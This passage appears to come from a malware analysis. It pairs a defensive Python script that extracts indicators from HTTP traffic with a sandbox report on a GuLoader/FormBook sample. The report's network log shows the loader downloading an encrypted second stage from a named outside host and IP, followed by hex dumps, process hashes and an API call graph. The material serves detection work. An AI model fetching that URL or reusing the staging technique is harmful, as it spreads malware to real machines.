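    """Split an HTTP/1.1 head into its start line and a lower-cased header map."""
    head = message.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def browser_header_gaps(headers: Dict[str, str]) -> List[str]:
    """Baseline headers missing from a request whose UA claims to be a browser."""
    if not headers.get("user-agent", "").startswith("Mozilla/5.0"):
        return []
    return [h for h in BROWSER_BASELINE if h not in headers]


def classify_body(head: bytes) -> str:
    """Cheap magic-number check; 'opaque' means no known container, i.e. encrypted or custom."""
    for magic, kind in MAGICS.items():
        if head.startswith(magic):
            return kind
    return "opaque"


def extract_iocs(request: str, response: str, dest_ip: str, dest_port: int,
                 body_head: bytes) -> Dict[str, object]:
    start, req_h = parse_http(request)
    method, path, _version = start.split(" ", 2)
    status_line, resp_h = parse_http(response)
    scheme = "https" if dest_port == 443 else "http"
    gaps = browser_header_gaps(req_h)
    body_kind = classify_body(body_head)
    content_type = resp_h.get("content-type", "")
    return {
        "method": method,
        "url": f"{scheme}://{req_h['host']}{path}",
        "ip": dest_ip,
        "user_agent": req_h.get("user-agent", ""),
        "status": int(status_line.split(" ")[1]),
        "content_length": int(resp_h.get("content-length", "0")),
        "content_type": content_type,
        "header_gaps": gaps,
        "body_kind": body_kind,
        # Verdict: browser UA without browser headers fetching an opaque octet-stream.
        "suspicious": bool(gaps) and content_type.startswith("application/octet-stream")
                      and body_kind == "opaque",
    }


if __name__ == "__main__":
    for key, value in extract_iocs(REQUEST, RESPONSE, "122.201.127.17", 443, BODY_HEAD).items():
        print(f"{key}: {value}")
```

Two things to take from the run: the body does not start with MZ, so what was fetched is not a PE but an opaque blob that the loader has to decode itself (consistent with a second-stage that never touches disk in plaintext), and the indicators worth blocking are the URL, the resolved IP and the exact User-Agent string, which is a plausible Firefox value and therefore only useful in combination with the missing headers.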
Timestamp | Bytes transferred | Direction | Data
2025-01-11 03:50:55 UTC | 174 | OUT | GET /yzSJO174.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: babalharra.com.au
    Cache-Control: no-cache
2025-01-11 03:50:56 UTC | 249 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 03:50:55 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Last-Modified: Tue, 03 Dec 2024 05:37:53 GMT
    Accept-Ranges: bytes
    Content-Length: 290368
    Content-Type: application/octet-stream
2025-01-11 03:50:56 UTC | 7943 | IN | Data Raw: 76 6f f3 7f 72 b1 9d b1 ec 9a 0c 04 d6 03 fa 78 d3 90 7a f2 1e 3b 83 6a 04 cf ff f8 18 4e 1b 13 73 59 ad 36 8f 23 0f 5d ec a8 17 c9 c9 45 94 fd e7 db 7d b1 c4 23 99 da 9e c2 cc 3b c8 d1 15 f7 a1 2c c5 39 64 e7 bf 9b 3f a1 5f d3 ff 0c 89 b0 ce 91 c7 c5 2a 0d 99 c8 6f 8d c6 3f c6 6f e0 87 f7 57 20 0d 13 0d f2 55 26 56 35 35 cb 2a 5b 4c 14 b6 d6 ad 73 3b 37 b2 31 2e ca 23 15 64 b4 87 55 e9 d2 78 d6 68 29 24 20 84 fa 9e b5 b2 e8 99 23 8a bf 38 72 3d 0b 10 09 c7 6d f7 27 92 c2 b1 af c1 23 ce 98 60 75 09 85 a2 a8 45 cf 01 0a 2d e6 bc bd 7c b1 0f d9 e5 fc 96 e1 45 f0 64 b9 df c2 5f db 25 66 70 02 32 b5 a3 75 bb 0b 04 22 f4 b8 01 63 94 86 ad 0e 8c 17 86 e6 dc eb b7 67 05 bb 5d 83 4c 6a 74 f7 ad 7c 0c 05 ef cb 55 b4 41 39 08 3a f9 55 df 12 29 97 15 71 05 a0 df ce
    Data Ascii: vorxz;jNsY6#]E}#;,9d?_*o?oW U&V55*[Ls;71.#dUxh)$ #8r=m'#`uE-|Ed_%fp2u"cg]Ljt|UA9:U)q
2025-01-11 03:50:56 UTC | 8000 | IN | Data Raw: 04 fa 02 b3 1c 6f 0a 56 23 f9 8a 67 d6 9e da ca 7c 87 29 d2 d8 73 00 a4 eb 29 b5 2e cb db 41 f6 ec 48 dc 7c 6f f9 cd 3b 44 a3 fc c0 97 25 54 ba 4a 2e 3c d5 8b de 1a 35 c5 69 8b b5 bb 87 b0 d4 ec 09 94 7c 9e eb 00 cc f1 86 6a db 5c 15 a8 34 d8 f3 31 08 c9 20 be 8d ba 9d 89 e4 6c 3d 51 3d b4 6c 14 f0 98 99 ca 62 1f d4 99 fc d7 6e c1 8e 7a 5f 15 54 c3 bc cd 07 cd 10 29 61 88 ee 6d 15 b5 6e 9d 2a a1 24 00 87 0e a5 3a a5 93 ff 1b 35 9c c6 f9 88 c5 c9 f1 95 59 00 fa ec 4f a6 2d 68 6e db 9a 36 22 cd 9a 6f 76 8b 76 8f eb ee 10 b4 48 b8 25 e1 b5 8d 6c cf a9 b3 89 16 6d 6e c9 61 7e 3e 62 ce 45 7d f4 da 88 61 60 3b fd fd 61 c6 d6 35 30 a8 47 34 74 81 80 ef 13 3f f6 1d c3 25 e9 e7 e6 8a e2 c7 6d 9b 11 f4 ac e2 69 04 44 4d c3 6a aa 91 cc 4a 54 a7 2a 07 da ca c3 38 e4
    Data Ascii: oV#g|)s).AH|o;D%TJ.<5i|j\41 l=Q=lbnz_T)amn*$:5YO-hn6"ovvH%lmna~>bE}a`;a50G4t?%miDMjJT*8
2025-01-11 03:50:56 UTC | 8000 | IN | Data Raw: 7e c9 cb 98 b4 d9 94 ac 19 9a 0a f4 82 9d 77 1c fe 40 da 2b 61 b5 0b 5d fd 99 11 ba d1 0d 48 63 84 f0 9f b3 26 2f 42 15 ad 7f 5d 4e 94 e9 2c e3 6b 32 42 c8 1d 05 68 b3 49 1a ec 03 56 f4 19 6a a8 6e 68 6e fd 2f 08 b5 07 52 8d cb 09 36 ec 25 3e 86 18 ac ba 4f 9f 62 a4 8b 01 d0 31 66 50 a2 6e 2e 7c 71 6a 6e b7 83 6a f8 36 ee a6 79 9e 91 2a f5 9e 8e 63 82 a1 16 d8 11 05 aa 8c 6c 20 3d e1 25 76 af e7 44 ed ff 2b 75 72 4a 50 42 0d 62 ae 19 3f 20 f7 b8 2b 47 ff 67 b9 36 68 de 3b 10 27 79 34 9c af dc 85 4d 6a 77 49 1e f7 1c 66 4f b0 62 6d 0e 9e cb da 39 67 e7 7c a0 54 9e ac 72 bf 69 1a c5 ba d4 c2 75 13 34 38 9a b9 fc 1d 07 b7 d1 49 a8 bd a7 47 19 27 30 93 b8 19 3d b4 1b b7 43 98 59 29 25 60 e3 4c cb 67 a2 82 91 cd 11 38 94 8a d2 0b 84 35 c0 12 bf 21 7f 50 13 ba
    Data Ascii: ~w@+a]Hc&/B]N,k2BhIVjnhn/R6%>Ob1fPn.|qjnj6y*cl =%vD+urJPBb? +Gg6h;'y4MjwIfObm9g|Triu48IG'0=CY)%`Lg85!P
2025-01-11 03:50:56 UTC | 8000 | IN | Data Raw: a5 66 36 e7 5f 0c 40 a1 1c 0e 91 9a bb 49 57 39 f5 4a 98 02 26 51 03 35 ad 65 ff 71 88 b0 63 48 27 d8 1b ab ae ef 43 33 c3 67 60 d8 d4 ba fb f5 04 01 62 23 8c 90 7a ca 22 08 c8 e2 55 ee 3e f5 86 5b 3b 46 4d a5 3f 52 a9 76 a5 11 58 b9 2d 67 27 dc cc d5 43 9c d4 34 8e 4e 52 4e 00 e0 ce fd bc de 60 84 63 4c 30 00 bc 67 47 f0 58 00 18 4f a0 95 44 a9 7b ac 57 b7 ee 31 fa 83 1f 2d 16 87 34 67 6a 80 a1 5f b4 1e 9f 58 5c d2 59 5f 05 87 bd 8b cc 34 16 2d 69 d3 41 72 e1 58 b8 34 23 17 4f 0d 92 0e 57 0f 9b f5 21 26 f0 a4 14 c9 8f a0 06 09 a1 c7 2b 6a 40 74 ea bc f0 87 2c 18 87 91 ee 73 28 d0 74 49 38 cc b9 96 59 bb 90 52 93 c9 e4 16 9a 1d 76 be cf fd 3c 90 8a d6 f5 6a 18 d6 af f5 ea 27 d8 f1 ba d4 42 3f 4a d6 6c dd c5 21 fa 62 11 4a ec f9 2f 11 2f 04 33 ef 48 83 b2
    Data Ascii: f6_@IW9J&Q5eqcH'C3g`b#z"U>[;FM?RvX-g'C4NRN`cL0gGXOD{W1-4gj_X\Y_4-iArX4#OW!&+j@t,s(tI8YRv<j'B?Jl!bJ//3H
2025-01-11 03:50:56 UTC | 8000 | IN | Data Raw: 22 4c 8e 09 26 10 67 5b d1 a5 7d d4 c9 15 65 a4 f5 da ad 5c 1d 82 3a 5f 7a 12 e1 92 c6 75 5e 1f ca 8f c6 42 08 4f 07 19 73 1a fa dc d8 63 a8 b7 3a 02 cf f4 e7 b2 80 5a 0a 5f 78 0b 33 c6 cb fa 06 ef 35 55 4b cb 86 b5 a7 ea 54 96 51 4f ea 07 8e dd 31 5d f7 2f 50 fc f2 53 fd 91 e9 44 dc 10 1c 06 4a e4 fb d1 a8 e4 4f d4 79 ec 2f 7b 18 04 ad d8 d6 c0 5c d0 af 66 a3 f5 ac 08 a6 92 ef 0d af 75 b3 17 53 bd 89 15 07 da 6b 43 a8 05 c3 56 70 17 7c 36 c9 e9 92 90 2f 20 75 01 42 b2 bd 0e f6 ce 3f cb 20 d7 22 e7 6c b3 25 3d 26 57 ae e2 37 21 eb 8e be 69 6e 18 e9 db fc ac 1b 22 c4 25 eb ea c9 64 b0 37 13 ac 96 76 2e 90 fb 16 79 c0 6b 1e 43 1c 73 7a 98 f7 c5 96 70 01 1d ea 29 69 e0 55 51 32 f1 a7 af 92 18 9c 43 fc a9 bb 4e 39 b3 45 6f 88 40 d4 7e 2d 11 cc 1d 12 56 9a ab
    Data Ascii: "L&g[}e\:_zu^BOsc:Z_x35UKTQO1]/PSDJOy/{\fuSkCVp|6/ uB? "l%=&W7!in"%d7v.ykCszp)iUQ2CN9Eo@~-V
2025-01-11 03:50:56 UTC | 8000 | IN | Data Raw: 38 f0 8f cd ae 2f bd ab 42 8a 1b 73 af 35 5c 32 da 45 38 df f0 68 7a 1f 09 95 f0 10 3a c3 a7 92 7b a4 4a 11 5c 1e c3 9c 93 2b 13 b9 49 fa fd 48 25 49 d5 c0 d7 6f cf b6 87 00 a4 8c 03 25 f8 5e cd 62 6d 0d 04 95 09 67 dd 25 e2 2d 65 ef 43 e8 c3 e3 05 ab c0 91 d7 0c f9 55 fe 3c 07 ff ed ec fd 89 9a 43 21 b0 1e 40 79 80 04 fc 96 c3 76 53 99 18 ff cb 42 08 56 95 0a 5d 23 da 89 7c d8 85 ec 5e 57 04 41 a1 63 8c f6 ad 54 ba a3 98 4e ed 71 c7 19 d4 14 4a f1 4e 51 9d 80 69 1f 51 3e 92 89 c4 e2 55 7e e9 68 3c 38 cc e6 a1 e5 c9 e6 20 59 9c f6 2c 71 2c 45 c9 0c 11 dd fc fb 36 61 9a c1 aa c7 59 c4 d3 b8 11 01 14 1e 21 93 6b 59 f5 ca 0c d2 71 8c bb 86 9b b8 92 8e 7b 8c 46 31 c3 1b dc ed c2 a3 77 10 b3 6d b8 c5 e8 7b 1a 03 d3 ba a2 41 29 31 57 73 78 8d e0 e6 2e be 9f 2e
    Data Ascii: 8/Bs5\2E8hz:{J\+IH%Io%^bmg%-eCU<C!@yvSBV]#|^WAcTNqJNQiQ>U~h<8 Y,q,E6aY!kYq{F1wm{A)1Wsx..
2025-01-11 03:50:56 UTC | 8000 | IN | Data Raw: 2d db a1 cf e8 27 52 a8 9e c2 bf d4 0d 72 35 f9 3f 3f 9d b0 a2 06 dd 48 8e df 4a 36 ba 75 bb 68 7a ac 05 9e 74 7b b1 66 73 77 fd 59 fc a7 41 58 b5 80 06 8f 68 ee ef 7d 8b 9f 12 95 6c ef 13 6e 06 2c 99 e7 8f 31 d8 50 55 ad 21 b6 e6 42 44 67 92 bd a7 bd c7 b5 b4 ce 52 c1 e4 87 4a 25 63 dd 77 4c 35 57 7d fe f8 b1 d8 c4 ff e6 cf 27 e9 d9 6e 97 cd 40 b4 4d 5d 20 27 38 c7 1c 39 9c 1f 8a f1 31 c2 4c 33 ed 34 75 de c3 69 6c 4a 2d 92 c6 55 ad 82 28 f8 d5 8e a3 00 1f 05 a8 c2 b1 2d 3c 07 b3 9d 66 6d 46 e8 56 96 26 3c f9 08 68 00 1a df e6 85 33 bf a1 c0 ed 05 f5 1e 8b c8 a6 0d cf 74 49 3d 23 1b 0b b6 f5 63 8b 46 42 97 19 d1 90 6f 45 79 c3 d2 f3 a8 1b 9d 16 e3 2b ad 52 54 b0 63 2a 68 ea f6 42 9a 24 42 18 29 5c 13 48 3c 82 b3 2a ac b9 a8 cb 53 66 bc f2 4b 56 f2 04 8f
    Data Ascii: -'Rr5??HJ6uhzt{fswYAXh}ln,1PU!BDgRJ%cwL5W}'n@M] '891L34uilJ-U(-<fmFV&<h3tI=#cFBoEy+RTc*hB$B)\H<*SfKV
2025-01-11 03:50:56 UTC | 8000 | IN | Data Raw: 5f b1 cb e4 e4 ec 1f d4 f2 14 fc 03 72 33 23 6d c7 1d 1f 8d 43 3e 6b 75 b7 70 18 26 dd 74 f9 06 fa 42 df 81 7f bf 2a 7b 7e d7 08 a9 05 8d 85 b0 c2 ce 33 57 aa ae a5 e1 a6 30 92 03 90 68 f3 6c 83 4c 9b 07 ea b9 68 72 09 cf d1 ff 1b ac 87 8c 01 c5 97 53 a1 dc 78 63 9d 03 e9 31 e1 60 18 d2 20 fd 21 db 9f 39 83 8f 7a a0 3a 4b fe 9e 3f 16 de 9f 39 c2 48 3c e5 92 be 1e 98 6d 64 a0 23 7a b5 14 13 f3 d6 b8 f9 5c e7 b6 d7 b3 99 1b 65 ac 93 d9 6e f6 04 d6 42 a4 1e 9e 35 a9 8d 6d 31 94 fa 41 f7 ea a0 12 3b 29 0e 1b 6e ea 11 2f f3 18 bc 19 91 2b 8d 4a e7 6f 09 1b 50 37 65 75 f1 4c 0d ef af 56 6c 0e c5 db 6c e8 2c 02 be 09 a6 78 0e eb c4 e3 54 0a f6 ce 66 8f 96 93 b7 f8 19 cf 2c 67 2a 80 a4 e2 f5 27 4e 1e 68 ab a6 e5 8e f3 17 0b 16 83 24 63 60 af 12 67 fc 06 c1 48 ca
    Data Ascii: _r3#mC>kup&tB*{~3W0hlLhrSxc1` !9z:K?9H<md#z\enB5m1A;)n/+JoP7euLVll,xTf,g*'Nh$c`gH
2025-01-11 03:50:56 UTC | 8000 | IN | Data Raw: 87 db ca 1b 32 e7 a3 83 93 8f 81 1b 34 80 61 f8 68 ec be 56 3c e8 ec 78 97 05 20 82 2d 33 bb be ba e7 24 e2 af c2 7e ba 92 a2 b7 8c 49 b7 80 19 f8 82 fe 36 60 a3 b8 7c 87 96 d4 5c 2a 36 2d cf 30 b2 78 d6 04 08 f1 88 26 bb 4b e3 45 9b f9 b6 c5 7a ca df e7 d3 1b 92 65 c2 2a 98 55 b6 7d ba b9 56 43 d9 fb 3e f9 a8 df c9 08 1c 40 08 15 76 ce ea 50 fc 46 db 07 94 f9 dd d8 bf 81 32 74 49 c0 c6 83 10 cc b7 12 af 36 dd 0d 50 41 98 84 b2 ec b1 f5 8a 73 e1 8b ee 82 a5 74 ca e0 c1 79 1b 59 02 73 49 64 d7 2e 2e a2 da e6 a9 a3 80 8f 71 c7 32 07 a4 c7 42 3d 39 f5 fe 64 6b 8f eb 30 f3 e6 9f 05 4d 40 14 58 9e a3 ec bf 09 b5 3d 72 39 c1 8c 5e 56 0f 17 11 dc 45 1d a3 93 7c 54 8d a7 6e 9b 4f f6 b9 78 ac d7 ae d4 d8 f8 8b 3d ce f9 14 54 9a ab 6a c9 8b d6 40 99 de 30 24 b9 9c
    Data Ascii: 24ahV<x -3$~I6`|\*6-0x&KEze*U}VC>@vPF2tI6PAstyYsId..q2B=9dk0M@X=r9^VE|TnOx=Tj@0$
                                          2025-01-11 03:50:56 UTC8000INData Raw: 74 d0 2c 83 02 12 a0 ba 49 fb f3 cb 17 c2 34 e8 79 77 71 3a 3e 8c 73 3c 7f d3 8a 8a 76 16 4c f4 47 5e 41 51 36 fe 1f 4b be 71 ad 64 26 77 30 1d 75 a9 b6 04 c9 11 19 ac ca c8 69 08 8f 65 36 20 01 62 a1 fd 1f 57 0a ef 4c d6 c3 4a 52 bb d0 6a 15 56 4d 9a 73 c6 aa f9 d0 fd 96 b7 63 e7 e6 fd 0d 8f 8e 9d 0a 96 5f 7e e7 d6 d1 05 b3 bb cb ca 4f bd 19 61 6b ab bf a4 f0 e9 17 35 3f 0b ff 64 77 fe dd af 6b ca 06 ca 2b 60 fc df 36 c6 a9 db d8 b2 b2 d4 3a cf bc 5a 85 af 46 d3 01 a8 98 d1 54 43 bc fe 3b d5 36 e3 2f 64 c0 e6 67 cf e9 bd 18 5b 7c 28 7b ed 88 66 8f 11 a8 d4 06 16 50 9d c5 cd 79 9a 12 03 76 70 ba d8 d1 e8 81 de 25 84 46 1b 00 70 39 bb 40 e6 82 9c 1e b7 e8 b5 0f f4 5e 68 cf af cc db f1 4e 7e ab 56 34 f0 e7 00 8d d8 15 a3 0e 40 5e ef 1b 33 7e 8c 67 bb 0a 49
                                          Data Ascii: t,I4ywq:>s<vLG^AQ6Kqd&w0uie6 bWLJRjVMsc_~Oak5?dwk+`6:ZFTC;6/dg[|({fPyvp%Fp9@^hN~V4@^3~gI


                                          Target ID:5
                                          Start time:22:49:36
                                          Start date:10/01/2025
                                          Path:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Ntwph4urc1.exe"
                                          Imagebase:0x400000
                                          File size:437'610 bytes
                                          MD5 hash:C57DA1BB37A79E6F05722518DBADB3CE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1847253587.000000000507C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:9
                                          Start time:00:39:31
                                          Start date:11/01/2025
                                          Path:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Ntwph4urc1.exe"
                                          Imagebase:0x400000
                                          File size:437'610 bytes
                                          MD5 hash:C57DA1BB37A79E6F05722518DBADB3CE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:18.7%
                                            Dynamic/Decrypted Code Coverage:13.6%
                                            Signature Coverage:15.9%
                                            Total number of Nodes:1580
                                            Total number of Limit Nodes:32
                                            execution_graph 4024 401941 4025 401943 4024->4025 4030 402d3e 4025->4030 4031 402d4a 4030->4031 4075 40642b 4031->4075 4034 401948 4036 405b00 4034->4036 4117 405dcb 4036->4117 4039 405b28 DeleteFileW 4041 401951 4039->4041 4040 405b3f 4042 405c6a 4040->4042 4131 4063ee lstrcpynW 4040->4131 4042->4041 4160 40674c FindFirstFileW 4042->4160 4044 405b65 4045 405b78 4044->4045 4046 405b6b lstrcatW 4044->4046 4132 405d0f lstrlenW 4045->4132 4047 405b7e 4046->4047 4051 405b8e lstrcatW 4047->4051 4053 405b99 lstrlenW FindFirstFileW 4047->4053 4051->4053 4052 405c88 4163 405cc3 lstrlenW CharPrevW 4052->4163 4054 405c5f 4053->4054 4056 405bbb 4053->4056 4054->4042 4058 405c42 FindNextFileW 4056->4058 4068 405b00 60 API calls 4056->4068 4070 405456 24 API calls 4056->4070 4136 4063ee lstrcpynW 4056->4136 4137 405ab8 4056->4137 4145 405456 4056->4145 4156 4061b4 MoveFileExW 4056->4156 4058->4056 4062 405c58 FindClose 4058->4062 4059 405ab8 5 API calls 4061 405c9a 4059->4061 4063 405cb4 4061->4063 4064 405c9e 4061->4064 4062->4054 4066 405456 24 API calls 4063->4066 4064->4041 4067 405456 24 API calls 4064->4067 4066->4041 4069 405cab 4067->4069 4068->4056 4071 4061b4 36 API calls 4069->4071 4070->4058 4073 405cb2 4071->4073 4073->4041 4077 406438 4075->4077 4076 406683 4078 402d6b 4076->4078 4108 4063ee lstrcpynW 4076->4108 4077->4076 4080 406651 lstrlenW 4077->4080 4081 40642b 10 API calls 4077->4081 4084 406566 GetSystemDirectoryW 4077->4084 4086 406579 GetWindowsDirectoryW 4077->4086 4087 40669d 5 API calls 4077->4087 4088 40642b 10 API calls 4077->4088 4089 4065f4 lstrcatW 4077->4089 4090 4065ad SHGetSpecialFolderLocation 4077->4090 4101 4062bc 4077->4101 4106 406335 wsprintfW 4077->4106 4107 4063ee lstrcpynW 4077->4107 4078->4034 4092 40669d 4078->4092 4080->4077 4081->4080 4084->4077 4086->4077 4087->4077 4088->4077 4089->4077 4090->4077 4091 4065c5 SHGetPathFromIDListW CoTaskMemFree 4090->4091 4091->4077 4098 4066aa 
4092->4098 4093 406720 4094 406725 CharPrevW 4093->4094 4096 406746 4093->4096 4094->4093 4095 406713 CharNextW 4095->4093 4095->4098 4096->4034 4098->4093 4098->4095 4099 4066ff CharNextW 4098->4099 4100 40670e CharNextW 4098->4100 4113 405cf0 4098->4113 4099->4098 4100->4095 4109 40625b 4101->4109 4104 4062f0 RegQueryValueExW RegCloseKey 4105 406320 4104->4105 4105->4077 4106->4077 4107->4077 4108->4078 4110 40626a 4109->4110 4111 406273 RegOpenKeyExW 4110->4111 4112 40626e 4110->4112 4111->4112 4112->4104 4112->4105 4114 405cf6 4113->4114 4115 405d0c 4114->4115 4116 405cfd CharNextW 4114->4116 4115->4098 4116->4114 4166 4063ee lstrcpynW 4117->4166 4119 405ddc 4167 405d6e CharNextW CharNextW 4119->4167 4122 405b20 4122->4039 4122->4040 4123 40669d 5 API calls 4129 405df2 4123->4129 4124 405e23 lstrlenW 4125 405e2e 4124->4125 4124->4129 4126 405cc3 3 API calls 4125->4126 4128 405e33 GetFileAttributesW 4126->4128 4127 40674c 2 API calls 4127->4129 4128->4122 4129->4122 4129->4124 4129->4127 4130 405d0f 2 API calls 4129->4130 4130->4124 4131->4044 4133 405d1d 4132->4133 4134 405d23 CharPrevW 4133->4134 4135 405d2f 4133->4135 4134->4133 4134->4135 4135->4047 4136->4056 4173 405ebf GetFileAttributesW 4137->4173 4140 405ae5 4140->4056 4141 405ad3 RemoveDirectoryW 4143 405ae1 4141->4143 4142 405adb DeleteFileW 4142->4143 4143->4140 4144 405af1 SetFileAttributesW 4143->4144 4144->4140 4146 405471 4145->4146 4154 405513 4145->4154 4147 40548d lstrlenW 4146->4147 4148 40642b 17 API calls 4146->4148 4149 4054b6 4147->4149 4150 40549b lstrlenW 4147->4150 4148->4147 4152 4054c9 4149->4152 4153 4054bc SetWindowTextW 4149->4153 4151 4054ad lstrcatW 4150->4151 4150->4154 4151->4149 4152->4154 4155 4054cf SendMessageW SendMessageW SendMessageW 4152->4155 4153->4152 4154->4056 4155->4154 4157 4061d5 4156->4157 4158 4061c8 4156->4158 4157->4056 4176 40603a 4158->4176 4161 406762 FindClose 4160->4161 4162 405c84 4160->4162 4161->4162 4162->4041 4162->4052 4164 405c8e 4163->4164 4165 
405cdf lstrcatW 4163->4165 4164->4059 4165->4164 4166->4119 4168 405d8b 4167->4168 4169 405d9d 4167->4169 4168->4169 4170 405d98 CharNextW 4168->4170 4171 405cf0 CharNextW 4169->4171 4172 405dc1 4169->4172 4170->4172 4171->4169 4172->4122 4172->4123 4174 405ed1 SetFileAttributesW 4173->4174 4175 405ac4 4173->4175 4174->4175 4175->4140 4175->4141 4175->4142 4177 406090 GetShortPathNameW 4176->4177 4178 40606a 4176->4178 4180 4060a5 4177->4180 4181 4061af 4177->4181 4203 405ee4 GetFileAttributesW CreateFileW 4178->4203 4180->4181 4183 4060ad wsprintfA 4180->4183 4181->4157 4182 406074 CloseHandle GetShortPathNameW 4182->4181 4184 406088 4182->4184 4185 40642b 17 API calls 4183->4185 4184->4177 4184->4181 4186 4060d5 4185->4186 4204 405ee4 GetFileAttributesW CreateFileW 4186->4204 4188 4060e2 4188->4181 4189 4060f1 GetFileSize GlobalAlloc 4188->4189 4190 406113 4189->4190 4191 4061a8 CloseHandle 4189->4191 4205 405f67 ReadFile 4190->4205 4191->4181 4196 406132 lstrcpyA 4199 406154 4196->4199 4197 406146 4198 405e49 4 API calls 4197->4198 4198->4199 4200 40618b SetFilePointer 4199->4200 4212 405f96 WriteFile 4200->4212 4203->4182 4204->4188 4206 405f85 4205->4206 4206->4191 4207 405e49 lstrlenA 4206->4207 4208 405e8a lstrlenA 4207->4208 4209 405e92 4208->4209 4210 405e63 lstrcmpiA 4208->4210 4209->4196 4209->4197 4210->4209 4211 405e81 CharNextA 4210->4211 4211->4208 4213 405fb4 GlobalFree 4212->4213 4213->4191 4214 4015c1 4215 402d3e 17 API calls 4214->4215 4216 4015c8 4215->4216 4217 405d6e 4 API calls 4216->4217 4229 4015d1 4217->4229 4218 401631 4220 401663 4218->4220 4221 401636 4218->4221 4219 405cf0 CharNextW 4219->4229 4223 401423 24 API calls 4220->4223 4241 401423 4221->4241 4230 40165b 4223->4230 4228 40164a SetCurrentDirectoryW 4228->4230 4229->4218 4229->4219 4231 401617 GetFileAttributesW 4229->4231 4233 4059bf 4229->4233 4236 405925 CreateDirectoryW 4229->4236 4245 4059a2 CreateDirectoryW 4229->4245 4231->4229 4248 4067e3 GetModuleHandleA 4233->4248 4237 
405972 4236->4237 4238 405976 GetLastError 4236->4238 4237->4229 4238->4237 4239 405985 SetFileSecurityW 4238->4239 4239->4237 4240 40599b GetLastError 4239->4240 4240->4237 4242 405456 24 API calls 4241->4242 4243 401431 4242->4243 4244 4063ee lstrcpynW 4243->4244 4244->4228 4246 4059b2 4245->4246 4247 4059b6 GetLastError 4245->4247 4246->4229 4247->4246 4249 406809 GetProcAddress 4248->4249 4250 4067ff 4248->4250 4252 4059c6 4249->4252 4254 406773 GetSystemDirectoryW 4250->4254 4252->4229 4253 406805 4253->4249 4253->4252 4255 406795 wsprintfW LoadLibraryExW 4254->4255 4255->4253 5025 402a42 5026 402d1c 17 API calls 5025->5026 5027 402a48 5026->5027 5028 402a88 5027->5028 5029 402a6f 5027->5029 5036 402925 5027->5036 5030 402aa2 5028->5030 5031 402a92 5028->5031 5034 402a74 5029->5034 5035 402a85 5029->5035 5033 40642b 17 API calls 5030->5033 5032 402d1c 17 API calls 5031->5032 5032->5036 5033->5036 5039 4063ee lstrcpynW 5034->5039 5040 406335 wsprintfW 5035->5040 5039->5036 5040->5036 5041 401c43 5042 402d1c 17 API calls 5041->5042 5043 401c4a 5042->5043 5044 402d1c 17 API calls 5043->5044 5045 401c57 5044->5045 5046 401c6c 5045->5046 5047 402d3e 17 API calls 5045->5047 5048 402d3e 17 API calls 5046->5048 5052 401c7c 5046->5052 5047->5046 5048->5052 5049 401cd3 5051 402d3e 17 API calls 5049->5051 5050 401c87 5053 402d1c 17 API calls 5050->5053 5055 401cd8 5051->5055 5052->5049 5052->5050 5054 401c8c 5053->5054 5056 402d1c 17 API calls 5054->5056 5057 402d3e 17 API calls 5055->5057 5058 401c98 5056->5058 5059 401ce1 FindWindowExW 5057->5059 5060 401cc3 SendMessageW 5058->5060 5061 401ca5 SendMessageTimeoutW 5058->5061 5062 401d03 5059->5062 5060->5062 5061->5062 5063 402b43 5064 4067e3 5 API calls 5063->5064 5065 402b4a 5064->5065 5066 402d3e 17 API calls 5065->5066 5067 402b53 5066->5067 5068 402b57 IIDFromString 5067->5068 5070 402b8e 5067->5070 5069 402b66 5068->5069 5068->5070 5069->5070 5073 4063ee lstrcpynW 5069->5073 5072 402b83 CoTaskMemFree 5072->5070 
5073->5072 5074 402947 5075 402d3e 17 API calls 5074->5075 5076 402955 5075->5076 5077 40296b 5076->5077 5078 402d3e 17 API calls 5076->5078 5079 405ebf 2 API calls 5077->5079 5078->5077 5080 402971 5079->5080 5102 405ee4 GetFileAttributesW CreateFileW 5080->5102 5082 40297e 5083 402a21 5082->5083 5084 40298a GlobalAlloc 5082->5084 5087 402a29 DeleteFileW 5083->5087 5088 402a3c 5083->5088 5085 4029a3 5084->5085 5086 402a18 CloseHandle 5084->5086 5103 40345a SetFilePointer 5085->5103 5086->5083 5087->5088 5090 4029a9 5091 403444 ReadFile 5090->5091 5092 4029b2 GlobalAlloc 5091->5092 5093 4029c2 5092->5093 5094 4029f6 5092->5094 5095 40324c 31 API calls 5093->5095 5096 405f96 WriteFile 5094->5096 5101 4029cf 5095->5101 5097 402a02 GlobalFree 5096->5097 5098 40324c 31 API calls 5097->5098 5099 402a15 5098->5099 5099->5086 5100 4029ed GlobalFree 5100->5094 5101->5100 5102->5082 5103->5090 5104 7435103d 5107 7435101b 5104->5107 5114 74351516 5107->5114 5109 74351020 5110 74351027 GlobalAlloc 5109->5110 5111 74351024 5109->5111 5110->5111 5112 7435153d 3 API calls 5111->5112 5113 7435103b 5112->5113 5116 7435151c 5114->5116 5115 74351522 5115->5109 5116->5115 5117 7435152e GlobalFree 5116->5117 5117->5109 5118 4053ca 5119 4053da 5118->5119 5120 4053ee 5118->5120 5121 4053e0 5119->5121 5130 405437 5119->5130 5122 4053f6 IsWindowVisible 5120->5122 5128 40540d 5120->5128 5124 404390 SendMessageW 5121->5124 5125 405403 5122->5125 5122->5130 